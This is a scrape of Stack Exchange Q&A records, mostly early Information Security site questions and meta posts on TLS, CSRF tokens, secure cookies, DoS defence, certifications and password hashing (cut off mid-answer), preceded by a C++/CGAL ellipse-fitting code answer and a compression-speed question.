theta = 0.784877 We can then plot this with gnuplot set parametric
plot "points" pt 7 ps 2, [0:2*pi] a*cos(t)*cos(theta) - b*sin(t)*sin(theta) + cx, a*cos(t)*sin(theta) + b*sin(t)*cos(theta) +
cy lw 2 to get Implementation The code below does this: // Compile with clang++ -DBOOST_ALL_NO_LIB -DCGAL_USE_GMPXX=1 -O2 -g -DNDEBUG -Wall -Wextra -pedantic -march=native -frounding-math main.cpp -lgmpxx -lmpfr -lgmp
#include <CGAL/Cartesian.h>
#include <CGAL/Min_ellipse_2.h>
#include <CGAL/Min_ellipse_2_traits_2.h>
#include <CGAL/Exact_rational.h>
#include <cassert>
#include <cmath>
#include <fstream>
#include <iostream>
#include <string>
#include <vector>
typedef CGAL::Exact_rational NT;
typedef CGAL::Cartesian<NT> K;
typedef CGAL::Point_2<K> Point;
typedef CGAL::Min_ellipse_2_traits_2<K> Traits;
typedef CGAL::Min_ellipse_2<Traits> Min_ellipse;
struct EllipseCanonicalEquation {
double semimajor; // Length of semi-major axis
double semiminor; // Length of semi-minor axis
double cx; // x-coordinate of center
double cy; // y-coordinate of center
double theta; // Rotation angle
};
std::vector<Point> read_points_from_file(const std::string &filename){
std::vector<Point> ret;
std::ifstream fin(filename);
float x,y;
while(fin>>x>>y){
std::cout<<x<<" "<<y<<std::endl;
ret.emplace_back(x, y);
}
return ret;
}
// Uses "Smallest Enclosing Ellipses -- An Exact and Generic Implementation in C++"
// under the hood.
EllipseCanonicalEquation get_min_area_ellipse_from_points(const std::vector<Point> &pts){
// Compute minimum ellipse using randomization for speed
Min_ellipse me2(pts.data(), pts.data()+pts.size(), true);
std::cout << "done." << std::endl;
// If it's degenerate, the ellipse is a line or a point
assert(!me2.is_degenerate());
// Get coefficients for the equation
// r*x^2 + s*y^2 + t*x*y + u*x + v*y + w = 0
double r, s, t, u, v, w;
me2.ellipse().double_coefficients(r, s, t, u, v, w);
// Convert from CGAL's coefficients to Wikipedia's coefficients
// A*x^2 + B*x*y + C*y^2 + D*x + E*y + F = 0
const double A = r;
const double B = t;
const double C = s;
const double D = u;
const double E = v;
const double F = w;
// Get the canonical form parameters
// Using equations from https://en.wikipedia.org/wiki/Ellipse#General_ellipse
const auto a = -std::sqrt(2*(A*E*E+C*D*D-B*D*E+(B*B-4*A*C)*F)*((A+C)+std::sqrt((A-C)*(A-C)+B*B)))/(B*B-4*A*C);
const auto b = -std::sqrt(2*(A*E*E+C*D*D-B*D*E+(B*B-4*A*C)*F)*((A+C)-std::sqrt((A-C)*(A-C)+B*B)))/(B*B-4*A*C);
const auto cx = (2*C*D-B*E)/(B*B-4*A*C);
const auto cy = (2*A*E-B*D)/(B*B-4*A*C);
double theta;
if(B!=0){
theta = std::atan(1/B*(C-A-std::sqrt((A-C)*(A-C)+B*B)));
} else if(A<C){
theta = 0;
} else { //A>C
theta = M_PI;
}
return EllipseCanonicalEquation{a, b, cx, cy, theta};
}
int main(int argc, char** argv){
if(argc!=2){
std::cerr<<"Provide name of input containing a list of x,y points"<<std::endl;
std::cerr<<"Syntax: "<<argv[0]<<" <Filename>"<<std::endl;
return -1;
}
const auto pts = read_points_from_file(argv[1]);
const auto eq = get_min_area_ellipse_from_points(pts);
// Convert canonical equation for rotated ellipse to parametric based on:
// https://math.stackexchange.com/a/2647450/14493
std::cout << "Ellipse has the parametric equation " << std::endl;
std::cout << "x(t) = a*cos(t)*cos(theta) - b*sin(t)*sin(theta) + cx"<<std::endl;
std::cout << "y(t) = a*cos(t)*sin(theta) + b*sin(t)*cos(theta) + cy"<<std::endl;
std::cout << "with" << std::endl;
std::cout << "a = " << eq.semimajor << std::endl;
std::cout << "b = " << eq.semiminor << std::endl;
std::cout << "cx = " << eq.cx << std::endl;
std::cout << "cy = " << eq.cy << std::endl;
std::cout << "theta = " << eq.theta << std::endl;
return 0;
} | {
"source": [
"https://scicomp.stackexchange.com/questions/40494",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/41855/"
]
} |
41,760 | I've come across compression algorithms, I tried creating a simple run-length encoding algorithm but I notice that when I searched other algorithms I was shocked to know that some algorithms can process thousands of megabits per second how is this possible? I tried compressing a 1GB length text it was taking some time for me. How do is this achievable? or am I missing something here? I can't code well in C, so I created my simple program in Python can these speeds only be available in C? | The short answer to your question is this: If your goal is speed (as it is in typical applications of data compression), then (i) you need to choose a programming language that allows you to write algorithms close to the hardware, and (ii) you will spend a very large amount of time benchmarking and profiling your software to find where it is slow, and then fix these places by using better algorithms and better ways of implementing these algorithms. The authors of the compression packages you mention have not chosen to use magic to achieve the speed shown in the table. They have just put a large effort (probably years of work) into making their software fast. | {
"source": [
"https://scicomp.stackexchange.com/questions/41760",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/43685/"
]
} |
880 | There are memes common to whole Stack Exchange . But after spending some time in The DMZ it becomes evident that Information Security has it's own memes (e.g. rory). I therefore propose that this space be used to document the memes endemic to Information Security's culture. One meme per answer please. | Meme: Don't roll your own. (AKA: The first rule of cryptography.) Originator: Unknown. One of the most infamous uses on IT Security is by D.W., here . This meme is also related to / a synonym of "Don't be a Dave!" Cultural Height: TBD Background: Everyone seems to want to write their own ciphers, or create their own security mechanisms. Unfortunately, this usually doesn't end well. As such, the phrase "don't roll your own" has become a frequent staple of IT Security advice, as well as on other boards (e.g. Crypto SE) and across the entire information security community. "Anyone can invent an encryption algorithm they themselves can't break; it's much harder to invent one that no one else can break" - Bruce Schneier | {
"source": [
"https://security.meta.stackexchange.com/questions/880",
"https://security.meta.stackexchange.com",
"https://security.meta.stackexchange.com/users/5501/"
]
} |
1,447 | Last year, Security.SE took part in the Winter Bash Hat Dash , where users earned "hats" for their gravatars by completing certain tasks (analogous to badges): Certain actions would trigger the user receiving a hat, which their gravatar could then "wear". For example, editing a post would yield an editor-themed hat (fedora with pen) to the editor. Here's the run down of last year's: The event ran from 19 December 2012 to 4 January 2013. Users had their entire hat collection on http://winterbash2013.stackexchange.com . Individual users who didn’t want to participate, didn’t want to see hats, and/or are generally anti-hat had an "I hate hats" option available.. The only visual change to the site itself was the presence of the hats and the "I hate hats" button in the footer. We need to let Stack Exchange know by end of November 2013, so vote on one of the two answers below . | Yes! Gimme dem hats! I want all sorts of winter themed nonsense! | {
"source": [
"https://security.meta.stackexchange.com/questions/1447",
"https://security.meta.stackexchange.com",
"https://security.meta.stackexchange.com/users/485/"
]
} |
2,043 | Suppose a question was asked 4 months ago and the OP was satisfied by a given available answer: Is there any benefit to add y own answer to the OP's question 4 months later? | Yes, if you have another way to answer the question posed, that you think has some merits, you should post it. The answers are not just for the OP. If the OP was satisfied, good for them; but think of the people who will be looking for that question later (depending on the question, there may be hundreds or thousands of them... or hundreds of thousands). Users generally overestimate the importance of "accepted" checkmark. Just a few hours ago, I came across an answer that was accepted and upvoted, but offered a poor solution for the problem posed. Under it, there was a later answer with started off with a half-apology "I know this is resolved, but... " and proceeded to present the correct, canonical solution to the problem. | {
"source": [
"https://security.meta.stackexchange.com/questions/2043",
"https://security.meta.stackexchange.com",
"https://security.meta.stackexchange.com/users/-1/"
]
} |
2,151 | I'm logged in to security.stackexchange and I'm not using https to browse the site. Does this mean that the site is vulnerable to session hijacking? I assume that it's not, but I don't get how session is protected if connection is not secure. | The session cookies (or at least, what looks like session cookies to me) acct and sgt are both served with the HTTPOnly flag. This means that client side Javascript can't access them, making it hard to session hijack using things like XSS vulnerabilities or similar. This does not protect against at attacker who can intercept your traffic, but in that case, it is possible to access the site with HTTPS enabled - just go to https://security.stackexchange.com I don't know why it doesn't default to the secure version, but there is relatively little sensitive data being transferred after the initial sign in (almost everything is publicly available, after all), so it may be that the cache advantages of not encrypting outweigh the security benefits. | {
"source": [
"https://security.meta.stackexchange.com/questions/2151",
"https://security.meta.stackexchange.com",
"https://security.meta.stackexchange.com/users/9068/"
]
} |
2,159 | A site as big as stackoverflow must certainly attract a lot of spammers and bots. Hence, I find it strange that they are not using captcha, either to create a new account or to post a new answer as a guest. Are they using hidden techniques like honeypot or they just expect the community to flag all the spams and delete it? | As stated by Jeff Atwood himself , StackExchange uses several techniques to reduce spam. captcha script detection heuristics and "honeypots" user flagging (spam / offensive / moderator attention) auto-removal of some items based on certain flag thresholds being met active moderator participation throughout the day to look at moderator flagged items They are also using captchas , which are triggered under some specific conditions. I have to complete one from time to time. | {
"source": [
"https://security.meta.stackexchange.com/questions/2159",
"https://security.meta.stackexchange.com",
"https://security.meta.stackexchange.com/users/50051/"
]
} |
2,171 | I'm honestly being serious. It's just not on this forum either. Why do people put in the time and effort to post a question they can simply google the answer for? Posting their question on a forum like this takes more time than it would to google the answer, so why do people do it? | Google-searching is a rarefying skill. It seems to be a question of generation. Let me put some historical context. In days of my youth (say, 25 years ago, in the late 1980s and early 1990s), when you wanted to learn about something, you went to the public library and looked it up in an encyclopaedia. You also scanned the books on display to see if there was one about your research subject. If you wanted more data you had to invest time and money to order specialized books in a bookshop. All this learning was very active. Then, from the mid-1990s onward, the Web began to grow and accumulate data, and search engines appeared (remember Altavista ?). People who were used to the library-searching began to use search engines in about the same way: to locate and pinpoint sought-after information. In the early 2000s (2001, to be precise), Wikipedia appeared and the searching process began to change. The aggregation of information in Wikipedia meant that it became a relatively natural entry point. If you wanted to learn about a subject, you began by reading the Wikipedia article, and possibly followed some of the internal and external links; there is little googling involved in such a process. This also forced search engines to somehow change their stance: while in 1995 you wanted to learn who was the 6th emperor of the Qing dynasty(*), in 2005 you go to Google to know when the nearest restaurant opens. This is still information, but not the same usage context. Then social networks appeared. They completely reversed the way people use the Internet. This is especially apparent in young people (say, 20 years old or less), who spend inordinate amounts of time connected to Facebook and its ilk. They use the Internet not by going forth and exploring the information jungle with the help of search engines or even Wikipedia; they simple receive a lot of the stuff from their extended network of relations. A youth who grew up to the Internet through social networks has hundreds of Internet-friends, and has barely enough time to simply sift through all the data that they push unto him. For him, Google-searching is an almost alien concept. When he really wants to learn about a specific subject, he asks: he pushes a message so that his Internet-friends, not an anonymous robot like Google, gives him the answer. Different site, same people: when social network users come to StackExchange, they keep their Internet usage habits: they don't look things up in Google; they ask. Many do not even look up other questions in StackExchange, which is why there are many duplicates. The amazing thing is how fast this transformation occurred: in two decades, search engines transitioned from "bleeding edge technology" to "tool for dinosaurs". (Of course I am talking generalities here; there are still people who use search engines, and even people who go to public libraries. And there are good reasons to ask questions as well. But my point is that the googling reflex is not as widespread as it used to be.) (*) It is Qianlong , or Daoguang if you do not count the first two dynasty members who ruled before the conquest of China from the Ming. But you could get that information by simply typing "6th qing emperor" in Google and read the two first hits, which are Wikipedia entries. | {
"source": [
"https://security.meta.stackexchange.com/questions/2171",
"https://security.meta.stackexchange.com",
"https://security.meta.stackexchange.com/users/55201/"
]
} |
2,288 | The question: Authenticating a user via SMS elicited a very interesting comment from the OP after a very new user (<20 days) suggested the question was off-topic. I don't mean to kick a hornet's nest, but the incessant arguing on StackExchange about what is or isn't an acceptable post is mind-boggling to me. I get that we don't want people obviously trolling for opinions and instigating flame wars, but should we really be getting up in arms about a serious, productive question where a real person is getting real help about a real issue? Isn't that the whole point of this site? The rules are there to help protect that, not to get in the way.. – John Chrysostom Whether or not he's right about this specific case, the fact that the network is eliciting this kind of rant from contributing members is not good. You see it several times a week where a new user posts a low-quality first-post, gets torn apart for it, and never comes back. Is that really how we want this community run? Is it appropriate to refine our Off-Topic policy so that it catches fewer legitimate questions and is more friendly to first-time posters? Is it appropriate to flag / remove overly harsh comments on first-time posts and replace them with something softer / more encouraging? | This questions did strike me as especially hard over on SO, where new and/or low rep users regulary get downvoted and closed very fast. Over here on Sec.SE, because there is way less traffic, the problem is not as maddening as on SO, but still a problem we as a community should try and take care of. In fact, on SO there is a "SOCVR" team in an attempt to rather improve the question and be helpful to new users, trying to educate them as to how they may get better answers faster. (Side note: SOCVR do more than just that, but let's focus on the "help OP"-part right now) Nontheless, it might be a good approach to leave useful comments when downvoting and/or closevoting (as does schroeder regularly, there is a user script for auto-comments, which makes that easier for recurring problems), have a chat room with experienced users who try to explain the problems with questions to OPs in a more direct way, helping to shape the questions in form. This way, new users may still get ranted away (because, hey, it's still the internet), but there are people to help them understand the problems and tell them to not be giving up on their first shot. As I was a room member on SOCVR and I think the idea is pretty good, I just founded and linked the proposed chat room and am happy to have more people there. While the team on SO has a broader approach to moderation, I'll quote here some parts of their internal rules that may apply here too: Work with the OP to get their post into shape; most content has some value. De-escalate in case of disagreement. A post is to be actively handled by only one member of the room. (We don't need 4 members all leaving witty statements in the comments or in chat.) Moderate the post, not the user. (keep the discussion on the merits of the post, not on behavior of the user) If this catches any interest by anyone, I suggest the chat can discuss how things go from there. | {
"source": [
"https://security.meta.stackexchange.com/questions/2288",
"https://security.meta.stackexchange.com",
"https://security.meta.stackexchange.com/users/61443/"
]
} |
2,315 | The title is perhaps more inflammatory than the reality, but I can alter it later. Concerning this answer: https://security.stackexchange.com/a/120775/6253 to the question "What should you do if you catch ransomware mid-operation?" There has been a lot of controversy and a ton of flags. I am choosing to keep the answer in place. It is the only answer that suggests that interfering with the encryption process might damage the data The author discloses the conflict of interest From a technical standpoint, it has validity. From a conflict of interest perspective, all cards are on the table. People have the info they need to make an informed decision. This specific malware author is not benefitting from this specific instance: the topic and answer are generic, it's not about this author's own malware. So, there is only potential tangential personal benefit to the author from people following the advice. If the answer had more direct benefit to the author, then things would be different. | We should judge each answer on its own and whether it provides valid advice. The fact that the author is a malware developer is irrelevant. If the advice is good, then upvote it, if not, then downvote it. | {
"source": [
"https://security.meta.stackexchange.com/questions/2315",
"https://security.meta.stackexchange.com",
"https://security.meta.stackexchange.com/users/6253/"
]
} |
5 | From the view of somebody offering a web application, when somebody connects with TLS (https) to our service and submits the correct authentication data, is it safe to transmit all sensitive data over this line, or can it be that there is still eavesdropping? This question was IT Security Question of the Week . Read the Jul 29, 2011 blog entry for more details or submit your own Question of the Week. | It's important to understand what SSL does and does not do, especially since this is a very common source of misunderstanding. It encrypts the channel It applies integrity checking It provides authentication So, the quick answer should be: "yes, it is secure enough to transmit sensitive data". However, things are not that simple. The newest versions of SSL - version 3, or better yet: TLS, even TLS 1.2, are definitely better than previous versions. E.g. SSL 2 was relatively easy to MITM (Man in the middle). So, first it depends on protocol version. Both the channel encryption and the integrity checking are configurable in the protocol, i.e. you can choose which algorithms to use (cipher suite). Obviously, if you're using RSA1024/SHA512 you're much better off... However, SSL even support a mode of NULL encryption - i.e. no encryption at all, just wrapping the requests up to tunnel over SSL protocol. I.e., no protection. (This is configurable both at the client and the server, the selected cipher suite is the first matching set according to the configured order). Authentication in SSL has two modes: server-authentication only, and mutual authentication (client certificates). In both cases, the security ensured by the cryptographic certificates is definitely strong enough, however the validity of the actual authentication is only as good as your validity checks: Do you even bother checking the certificate? Do you ensure its validity? Trust chain? Who issued it? Etc. This last point re authentication is a lot easier in web applications , wherein the client can easily view the servers certificate, the lock icon is easily viewable, etc. With Web Services , you usually need to be more explicit in checking its validity (depending on your choice of platform). Note that this same point has tripped up so many mobile apps - even if the app developer remembered to use only TLS between the phone and the server, if the app doesn't explicitly verify the certificates then the TLS is broken. While there are some mostly theoretical attacks on the cryptography of SSL, from my PoV its still plenty strong enough for almost all purposes, and will be for a long time. What is actually done with the data at the other end? E.g. if its super-sensitive, or even credit card data, you dont want that in the browsers cache, or history, etc. Cookies (and thus authentication) can be shared between a secure, SSL channel, and a non-secure HTTP channel - unless explicitly marked with the "secure" attribute. So, shorter answer? Yes, SSL can be secure enough, but (as with most things) it depends how you use it. :) | {
"source": [
"https://security.stackexchange.com/questions/5",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25/"
]
} |
10 | I have a PHP application that I would like to have audited for security. I'm familiar with most of the general security issues, but want to make sure I didn't miss anything. What steps should I take to perform a self-audit? What tools are available? What is the best way to find a 3rd-party auditor? Any recommendations? Interested in both whitebox/codereview audit and blackbox/pentest? | I suggest taking a look at the following links: PHP Security Audit HOWTO Spike PHP Security Audit Tool Zend Application Security Audit 6 Free PHP Security & Auditing Tools | {
"source": [
"https://security.stackexchange.com/questions/10",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/32/"
]
} |
32 | What tools are available to assess the security of a web application? Please provide a small description of what the tool does. Update: More specifically, I'm looking for tools that assume no access to the source code (black box). | there's a large number of apps that can be used in web application assessments. One thing to consider is what kind of tool you're looking for. Some of them are better used alongside a manual test, where others are more designed for non-security specialist IT staff as more "black box" scanning tools. On top of that there's a huge range of scripts and point tools that can be used to assess specific areas of web application security. Some of my favorites Burp suite - http://www.portswigger.net . Free and commercial tool. Excellent adjunct to manual testing and has a good scanner capability as well. Of professional web application testers I know, most use this. W3af - http://w3af.org/ - Open source scanning tool, seems to be developing quite a bit at the moment, primarily focuses on the automated scanning side of things, is still requires quite a bit of knowledge to use effectively. On the pure scanning side there's a number of commercial tools available. Netsparker - http://www.mavitunasecurity.com/netsparker/ IBM AppScan - http://www-01.ibm.com/software/awdtools/appscan/ HP WebInspect - https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-201-200 ^9570_4000_100__ Cenzic Hailstorm - http://www.cenzic.com/products/cenzic-hailstormPro/ Acunetix WVS - http://www.acunetix.com/vulnerability-scanner/ NTObjectives NTOSpider - http://www.ntobjectives.com/ntospider | {
"source": [
"https://security.stackexchange.com/questions/32",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/45/"
]
} |
44 | Assuming you already have a website that implements all of the standard login stuff, what is the correct and most secure way to allow users to automatically be logged in for a certain time period (let's say 30 days)? This time period should be strictly enforced; ie, I don't think a valid solution would be giving a cookie an expiration date and hoping the user's browser deletes it in a timely manner. Details of the existing login system: A user must enter a user name and password The database stores usernames as well as strong_hash_function(password + user_specific_random_salt) Login forms are loaded and submitted over SSL, as are all subsequent pages There are many examples out there and many with obvious security flaws. Let's use PHP as the target language but the concepts should be applicable to any language. | My answer is incomplete and has a nontrivial flaw, in some situations - please see @Scott's answer instead. There are two parts to my answer: First, assuming your threat model does not worry about exposure of client side cookies , you can generate and store a nonce on the server side, hash that with the username and other info (e.g. client ip, computername, timestamp, similar stuff), and send that in the cookie. The nonce should be stored in the database, together with expiry date, and both checked when the cookie comes back. This should be a "rememberance" cookie only, NOT a session cookie - i.e. when you get that cookie without a session, reissue a new, regular session cookie. Also note that like the session cookie, this should be delivered only over https, and using the secure and httpOnly attributes, and of course have the cookie scoped properly etc. Second, for users that were remembered, you should (probably, depending on sensitivity) invoke a reauthentication process for certain sensitive operations. That is, sometimes they would need to put their password in again anyway, but seldom, and only for sensitive operations. This is to prevent attacks such as CSRF and shared desktop exposure. | {
"source": [
"https://security.stackexchange.com/questions/44",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47/"
]
} |
52 | How to disclose a security vulnerability in an ethical way? I've heard there are various schools of thought on this topic. I'd like to know the pros/cons of each. | You should let the developer(s) know privately so that they have a chance to fix it. After that, if and when you go public with the vulnerability, you should allow the developer enough time to fix the problem and whoever is exposed to it enough time to upgrade their systems. Personally, I would allow the developer to make the announcement in a security bulletin in most cases rather than announcing it myself. At the very least, I would wait for confirmation that the vulnerability has been fixed. If you have time and have access to the source code, you could also provide a patch. | {
"source": [
"https://security.stackexchange.com/questions/52",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/45/"
]
} |
89 | Which way of additionally feeding /dev/random entropy pool would you suggest for producing random passwords? Or, is there maybe a better way to locally create fully random passwords? | You can feed it with white noise from your sound chip, if present. See this article: http://www.linuxfromscratch.org/hints/downloads/files/entropy.txt | {
"source": [
"https://security.stackexchange.com/questions/89",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/23/"
]
} |
93 | Which credentials of the sub-list of IT certifications (as per the Information Systems Security Association ) would be considered MUST HAVE for a IT Security specialist? CEH Certified Ethical Hacker CIPP Certified Information Privacy Professional CISM Certified Information Security Manager CISSP Certified Information Systems Security Professional GIAC Global Information Assurance Certification LPT Licensed Penetration Tester AHC Anti-Hacking Certification AISC Advanced Information Security Certification CHFI Computer Hacking Forensic Investigator CPP Certified Protection Professional SSEC Software Security Engineering Certification | None. Generally speaking, certifications in the security field, much like most other tech areas, are required only for entry-level positions (when you have no experience to speak of), senior positions (when you need the long signature), and government jobs (when you need to answer an RFP to work there). By themselves, none of these are a replacement for good ol' experience and knowledge. That said, these are the ones that get more "respect" (that I am familiar with): CISSP CISM GIAC CEH for a juniorish pentester Also OWASP is supposedly coming out with their own cert soon, that would probably be respectable enough.... | {
"source": [
"https://security.stackexchange.com/questions/93",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/59/"
]
} |
100 | I read a blog post GitHub moves to SSL, but remains Firesheepable that claimed that cookies can be sent unencrypted over http even if the site is only using https. They write that a cookie should be marked with a "secure flag", but I don't know how that flag look like. How can I check that my cookies are only sent over encrypted https and not over unencrypted http, on my site that is only using https? | The cookies secure flag looks like this: secure; That's it. This should appear at the end of the Http header: Set-Cookie: mycookie=somevalue; path=/securesite/; Expires=12/12/2010; secure; httpOnly; Of course, to check it, simply plug in any proxy or sniffer (I use the excellent Fiddler ) and watch... *Bonus: I also threw in there the httpOnly attribute, protects against cookie access from Javascript space, e.g. via XSS. | {
"source": [
"https://security.stackexchange.com/questions/100",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69/"
]
} |
114 | It is hard to protect a server against Denial of Service attacks , DoS/DDoS. The two simple ways I can think of is to use a server with much resources (e.g. CPU and memory), and to build the server application to scale-up very well. Other protection mechanisms is probably used by the firewall. I can think of black-listing IP-addresses, but I don't really know how it works. And there is probably other techniques that are used by the firewall to protect against DDoS attacks. What techniques do advanced firewalls use to protect againt DoS/DDoS attacks? | Those are really two different, though similar, attacks. "Regular" DoS is based on trying crash the server/firewall, through some kind of bug or vulnerability. E.g. the well known SYN Flood attacks. The protection against these, are of course specific to the flaw (e.g. SYN cookies), and secure coding/design in general. However, DDoS simply attempts to overwhelm the server/firewall by flooding it with masses of apparently legitimate requests. Truthfully, a single firewall cannot really protect against this, since there is no real way to mark the "bad" clients. It's just a question of "best-effort", such as throttling itself so it doesnt crash, load balancers and failover systems, attempting to blacklist IPs (if not according to "badness", then according to usage), and of course, actively notifying the administrators. This last might be the most important, since in cases of apparent DDoS (I say apparent, because just regular peak usage might look like DDoS - true story) it really takes a human to differentiate the context of the situation, and figure out whether to shut down, best effort, provision another box, etc (or employ counter-attack... ssshhh!!) | {
"source": [
"https://security.stackexchange.com/questions/114",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69/"
]
} |
162 | I am fully aware of CSRF and have already implemented some safe forms, but I have never been happy with the results yet. I've created tokens as a md5 of username, form info and a salt and stored it in a session. This has a problem with tabbed browsing (can be fixed by keeping an array of active hashes) and with timing. I would like my hashes to work only for eg. 10 minutes, but how do I put a time-related variable in the hash? Can anybody point me to a good resource describing how to make CSRF security properly? | The best way to build CSRF protection properly: Don't. Most common frameworks have this protection already built in (ASP.NET, Struts, Ruby I think), or there are existing libraries that have already been vetted. (e.g. OWASP's CSRFGuard ). Another option, depending on your context, is to enforce reauthentication of the user, but only for specific, sensitive operations. As per your comments, if you need to implement this yourself, your solution is not too bad, but I would simplify it. You can generate a crypto-random nonce (long enough), store that in session memory, and change it every X minutes (you store the expiry time in session too). In each form, you include the nonce in a hidden form field, and compare that value when the form is posted. If the form token matches, you're clear. If not, you can accept e.g. the previous token as well, to handle the edge cases. Though I must say that I've seen too many failed attempts at implementing this by oneself, to really recommend this path. You're still better off finding a minimal package to do this for you. | {
"source": [
"https://security.stackexchange.com/questions/162",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/96/"
]
} |
164 | There is a great list of XSS vectors avaliable here: http://ha.ckers.org/xss.html , but It hasn't changed much lately (eg. latest FF version mentioned is 2.0). Is there any other list as good as this, but up to date? | The best new one I've seen recently is here http://html5sec.org/ good list of vectors with browser support noted and has quite a few of the more obscure ones. | {
"source": [
"https://security.stackexchange.com/questions/164",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/96/"
]
} |
211 | If I hash passwords before storing them in my database, is that sufficient to prevent them being recovered by anyone? I should point out that this relates only to retrieval directly from the database, and not any other type of attack, such as bruteforcing the login page of the application, keylogger on the client, and of course rubberhose cryptanalysis (or nowadays we should call it " Chocolate Cryptanalysis "). Of course any form of hash will not prevent those attacks. | Note: This answer was written in 2013. Many things have changed in the following years, which means that this answer should primarily be seen as how best practices used to be in 2013. The Theory We need to hash passwords as a second line of defence. A server which can authenticate users necessarily contains, somewhere in its entrails, some data which can be used to validate a password. A very simple system would just store the passwords themselves, and validation would be a simple comparison. But if a hostile outsider were to gain a simple glimpse at the contents of the file or database table which contains the passwords, then that attacker would learn a lot. Unfortunately, such partial, read-only breaches do occur in practice (a mislaid backup tape, a decommissioned but not wiped-out hard disk, an aftermath of a SQL injection attack -- the possibilities are numerous). See this blog post for a detailed discussion. Since the overall contents of a server that can validate passwords are necessarily sufficient to indeed validate passwords, an attacker who obtained a read-only snapshot of the server is in a position to make an offline dictionary attack : he tries potential passwords until a match is found. This is unavoidable. So we want to make that kind of attack as hard as possible. Our tools are the following: Cryptographic hash functions : these are fascinating mathematical objects which everybody can compute efficiently, and yet nobody knows how to invert them. This looks good for our problem - the server could store a hash of a password; when presented with a putative password, the server just has to hash it to see if it gets the same value; and yet, knowing the hash does not reveal the password itself. Salts : among the advantages of the attacker over the defender is parallelism . The attacker usually grabs a whole list of hashed passwords, and is interested in breaking as many of them as possible. He may try to attack several in parallel. For instance, the attacker may consider one potential password, hash it, and then compare the value with 100 hashed passwords; this means that the attacker shares the cost of hashing over several attacked passwords. A similar optimisation is precomputed tables , including rainbow tables ; this is still parallelism, with a space-time change of coordinates. The common characteristic of all attacks which use parallelism is that they work over several passwords which were processed with the exact same hash function . Salting is about using not one hash function, but a lot of distinct hash functions ; ideally, each instance of password hashing should use its own hash function. A salt is a way to select a specific hash function among a big family of hash functions. Properly applied salts will completely thwart parallel attacks (including rainbow tables). Slowness : computers become faster over time (Gordon Moore, co-founder of Intel, theorized it in his famous law ). Human brains do not. This means that attackers can "try" more and more potential passwords as years pass, while users cannot remember more and more complex passwords (or flatly refuse to). To counter that trend, we can make hashing inherently slow by defining the hash function to use a lot of internal iterations (thousands, possibly millions). We have a few standard cryptographic hash functions; the most famous are MD5 and the SHA family . Building a secure hash function out of elementary operations is far from easy. When cryptographers want to do that, they think hard, then harder, and organize a tournament where the functions fight each other fiercely. When hundreds of cryptographers gnawed and scraped and punched at a function for several years and found nothing bad to say about it, then they begin to admit that maybe that specific function could be considered as more or less secure. This is just what happened in the SHA-3 competition . We have to use this way of designing hash function because we know no better way. Mathematically, we do not know if secure hash functions actually exist; we just have "candidates" (that's the difference between "it cannot be broken" and "nobody in the world knows how to break it"). A basic hash function, even if secure as a hash function , is not appropriate for password hashing, because: it is unsalted, allowing for parallel attacks ( rainbow tables for MD5 or SHA-1 can be obtained for free, you do not even need to recompute them yourself); it is way too fast, and gets faster with technological advances. With a recent GPU (i.e. off-the-shelf consumer product which everybody can buy), hashing rate is counted in billions of passwords per second . So we need something better. It so happens that slapping together a hash function and a salt, and iterating it, is not easier to do than designing a hash function -- at least, if you want the result to be secure. There again, you have to rely on standard constructions which have survived the continuous onslaught of vindicative cryptographers. Good Password Hashing Functions PBKDF2 PBKDF2 comes from PKCS#5 . It is parameterized with an iteration count (an integer, at least 1, no upper limit), a salt (an arbitrary sequence of bytes, no constraint on length), a required output length (PBKDF2 can generate an output of configurable length), and an "underlying PRF". In practice, PBKDF2 is always used with HMAC , which is itself a construction built over an underlying hash function. So when we say "PBKDF2 with SHA-1", we actually mean "PBKDF2 with HMAC with SHA-1". Advantages of PBKDF2: Has been specified for a long time, seems unscathed for now. Is already implemented in various framework (e.g. it is provided with .NET ). Highly configurable (although some implementations do not let you choose the hash function, e.g. the one in .NET is for SHA-1 only). Received NIST blessings (modulo the difference between hashing and key derivation; see later on). Configurable output length (again, see later on). Drawbacks of PBKDF2: CPU-intensive only, thus amenable to high optimization with GPU (the defender is a basic server which does generic things, i.e. a PC, but the attacker can spend his budget on more specialized hardware, which will give him an edge). You still have to manage the parameters yourself (salt generation and storage, iteration count encoding...). There is a standard encoding for PBKDF2 parameters but it uses ASN.1 so most people will avoid it if they can (ASN.1 can be tricky to handle for the non-expert). bcrypt bcrypt was designed by reusing and expanding elements of a block cipher called Blowfish . The iteration count is a power of two, which is a tad less configurable than PBKDF2, but sufficiently so nevertheless. This is the core password hashing mechanism in the OpenBSD operating system. Advantages of bcrypt: Many available implementations in various languages (see the links at the end of the Wikipedia page). More resilient to GPU; this is due to details of its internal design. The bcrypt authors made it so voluntarily: they reused Blowfish because Blowfish was based on an internal RAM table which is constantly accessed and modified throughout the processing. This makes life much harder for whoever wants to speed up bcrypt with a GPU (GPU are not good at making a lot of memory accesses in parallel). See here for some discussion. Standard output encoding which includes the salt, the iteration count and the output as one simple to store character string of printable characters. Drawbacks of bcrypt: Output size is fixed: 192 bits. While bcrypt is good at thwarting GPU, it can still be thoroughly optimized with FPGA : modern FPGA chips have a lot of small embedded RAM blocks which are very convenient for running many bcrypt implementations in parallel within one chip. It has been done. Input password size is limited to 51 characters. In order to handle longer passwords, one has to combine bcrypt with a hash function (you hash the password and then use the hash value as the "password" for bcrypt). Combining cryptographic primitives is known to be dangerous (see above) so such games cannot be recommended on a general basis. scrypt scrypt is a much newer construction (designed in 2009) which builds over PBKDF2 and a stream cipher called Salsa20/8 , but these are just tools around the core strength of scrypt, which is RAM . scrypt has been designed to inherently use a lot of RAM (it generates some pseudo-random bytes, then repeatedly reads them in a pseudo-random sequence). "Lots of RAM" is something which is hard to make parallel. A basic PC is good at RAM access, and will not try to read dozens of unrelated RAM bytes simultaneously. An attacker with a GPU or a 